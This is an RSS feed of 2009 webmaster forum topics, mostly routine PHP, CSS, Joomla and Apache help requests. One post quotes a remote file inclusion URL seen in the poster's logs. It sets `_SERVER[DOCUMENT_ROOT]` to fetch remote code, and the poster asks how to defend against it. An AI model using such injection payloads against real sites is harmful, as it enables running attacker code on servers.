<?xml version="1.0" encoding="UTF-8"?>

<rss version="2.0" xmlns:blogChannel="http://backend.userland.com/blogChannelModule">

<channel>
<title>Webmasters and Developers forum - dslreports.com community</title>
<link>http://www.dslreports.com/forum/webmonk</link>
<description>Webmasters and Developers forum current topics</description>
<language>en</language>
<copyright>Copyright 2007, dslreports.com</copyright>
<pubDate>Thu, 10 Dec 2009 00:05:44 EDT</pubDate>
<lastBuildDate>Thu, 10 Dec 2009 00:05:44 EDT</lastBuildDate>

<image>
<title>dslreports.com</title>
<url>http://i.dslr.net/bbrdisc1.gif</url>
<link>http://www.dslreports.com</link>
<width>19</width>
<height>18</height>
<description>bbr disc</description>
</image>

<item>
<title>PHP help</title>
<link>http://www.dslreports.com/forum/remark,23454477</link>
<description><![CDATA[Hey Guys,

Newbie with PHP.  I've got a unix shell command that works command line, and looking for an answer how to execute it within PHP.  I keep getting errors based on single or double quotes.  The command is:

cat 'img.jpg' /var/log/apache/access.log | awk '{print $1}' | sort -u

How do I put this in a PHP script to work?

Thanks]]></description>
<guid isPermaLink="true">http://www.dslreports.com/forum/remark,23454477</guid>
<pubDate>2009-12-08 00:21:16</pubDate>
</item>

<item>
<title>Superfish sub-menu placment &#x26;amp; Joomla</title>
<link>http://www.dslreports.com/forum/remark,23457072</link>
<description><![CDATA[I am using Superfish as my menu and I (for the most part) like what I have, however once I go into a sub-menu like:
-National & Regional
--Regions
---Northern
---Central
---Southern
---Western
The second level menus do not line up, I can only guess that this can be adjusted in the CSS somewhere (I hope), but I have no idea where. Any ideas&#133;
Website: http://www.talligewi62.org/joomla/
Thanks!
--
I am here, although I may not know where &#147;HERE&#148; is&#133;]]></description>
<guid isPermaLink="true">http://www.dslreports.com/forum/remark,23457072</guid>
<pubDate>2009-12-08 13:59:42</pubDate>
</item>

<item>
<title>Apache Mod Rewrite Help</title>
<link>http://www.dslreports.com/forum/remark,23388623</link>
<description><![CDATA[What I'm trying to do is rewrite all URLs so that if the person pulls up a script in the root of the domain they get the URL rewritten so that it goes to /site/.

So for instance, if they go to http://www.domain.com/something.php or http://www.domain.com/somethingelse.php or http://www.domain.com/somethingelseyetagain.php they get the URL rewritten so that the URL looks like http://www.domain.com/site/[scriptname].php.

But, the rewritten URLs have to be excluded from URLs like http://www.domain.com/community and http://www.domain.com/wiki.

I currently have the following rewrite rule...

RewriteRule ^(.*)$ /site/$1

But that rule breaks the /community and /wiki URLs.

How do I fix this?
--
Tom]]></description>
<guid isPermaLink="true">http://www.dslreports.com/forum/remark,23388623</guid>
<pubDate>2009-11-24 11:53:31</pubDate>
</item>

<item>
<title>[PHP] Remote $_SERVER array poisoning</title>
<link>http://www.dslreports.com/forum/remark,23459372</link>
<description><![CDATA[Ok, so I've been noticing that some people like to put data into a URL that looks something like this...

http://www.darkscribes.org/bookshelf/  //?_SERVER[DOCUMENT_ROOT]=http://www.domain.com/link/to/some/nasty/code.txt

I can obviously see that I'm trying to be attacked here but what I'm wondering is what I can do to try and mitigate these flaws.

I do have Register Globals turned off, I don't accept user input and blindly start injecting them into include() calls.  Anything else you guys think I should do?
--
Tom
Darkscribes, Home of Anime and SciFi Fanfiction and Original works of Fiction.]]></description>
<guid isPermaLink="true">http://www.dslreports.com/forum/remark,23459372</guid>
<pubDate>2009-12-08 21:20:39</pubDate>
</item>

<item>
<title>Just starting out, kind of...</title>
<link>http://www.dslreports.com/forum/remark,23458253</link>
<description><![CDATA[I am no stranger to Wordpress. I can edit HTML and CSS, some PHP pretty well while gutting out a wordpress theme. I rely on Firefoxs' FireBug. :)

Coding is not completely greek but I have been moving into the world of Magento and would really like to tackle more hand coding. It would be nice to hear what the pro's recommend for someone like me starting out. I am going to tackle (x)html, css, php, and eventually flash/js. Can anyone recommend any books for starters?

Thanks]]></description>
<guid isPermaLink="true">http://www.dslreports.com/forum/remark,23458253</guid>
<pubDate>2009-12-08 17:40:48</pubDate>
</item>

<item>
<title>Some CSS Help</title>
<link>http://www.dslreports.com/forum/remark,23456595</link>
<description><![CDATA[Ok so I'm brain farting so much right now my office is starting to smell. LOL! I'm trying to figure out why if I use any HTML tags besides the standard bold, underline, or breaks my CSS is thrown off. The address is http://skullduggerytattoos.com/new/membership.php. I wanted to use H3 for the section titles and do an un-ordered list. If I use the H3 tag or the UL and LI tags my CSS is thrown off. At the top of the page you'll see how the margins are supposed to look and how the text is supposed to look (small caps style) but under Silver Membership that's how I want it to look but of course using UL and LI so I get the bullet points. If you look below the Silver Membership that's what I'm getting when using the H3, UL, and LI tags. What am I doing wrong here?
--
\m/(-_-)\m/
HEM DESIGNS]]></description>
<guid isPermaLink="true">http://www.dslreports.com/forum/remark,23456595</guid>
<pubDate>2009-12-08 12:44:03</pubDate>
</item>

<item>
<title>needing some help on creating a change password page</title>
<link>http://www.dslreports.com/forum/remark,23389601</link>
<description><![CDATA[Hi Guys
I am just wondering if anybody could help me out on a simple change password page for my email server.  All my username and password is on a mysql database basically I want the customer to login to the page then be able to change his/her password on that page.

I would like to do this on .php file if possible.]]></description>
<guid isPermaLink="true">http://www.dslreports.com/forum/remark,23389601</guid>
<pubDate>2009-11-24 15:03:05</pubDate>
</item>

<item>
<title>Joomla Template Problem</title>
<link>http://www.dslreports.com/forum/remark,23437293</link>
<description><![CDATA[I just turned Joomla on for my website and I uploaded the template that I wish to use for my business's new website, although I can't figure out how to change the text in the header picture. : www.twopugsbrand.com 

anyone have any clue on how to do it? I'm running Joomla 1.5 on HostPapa.com

TY
--
www.two-pugs.com   www.2pugs.etsy.com]]></description>
<guid isPermaLink="true">http://www.dslreports.com/forum/remark,23437293</guid>
<pubDate>2009-12-04 10:33:43</pubDate>
</item>

<item>
<title>Making a slide show...</title>
<link>http://www.dslreports.com/forum/remark,23441201</link>
<description><![CDATA[http://www.ctm-textiles.com/

Any suggestions for a simple and easy way to make a slideshow for my header?

I am using GIF animation and it takes a long time to load, it's choppy and it tedious to make. Any simpler solutions with out flash?

Thanks,
Peter M]]></description>
<guid isPermaLink="true">http://www.dslreports.com/forum/remark,23441201</guid>
<pubDate>2009-12-05 01:48:21</pubDate>
</item>

<item>
<title>HTTPS Passthrough with LDAP Authentication?</title>
<link>http://www.dslreports.com/forum/remark,23413927</link>
<description><![CDATA[Hi all,

For years, we've been using a server running Novell iChain (on our DMZ) to pass traffic through to our intranet server (within our firewall).  Recently, we learned that iChain has been discontinued so we're searching for a replacement product.  Our replacement needs to fulfill two functions:

1.  It needs to authenticate users against our Novell eDirectory (LDAP) system.

2.  It needs to pass traffic from the users to our intranet server (IIS running ASP scripts) seamlessly for the user.

I considered writing something myself, but there's got to be something like that out there.   Any ideas?
--
-Jason Levine
Support a children's charity. Buy a calendar and/or a photo book. Shooting For A Cause]]></description>
<guid isPermaLink="true">http://www.dslreports.com/forum/remark,23413927</guid>
<pubDate>2009-11-30 12:01:25</pubDate>
</item>

</channel>
</rss>
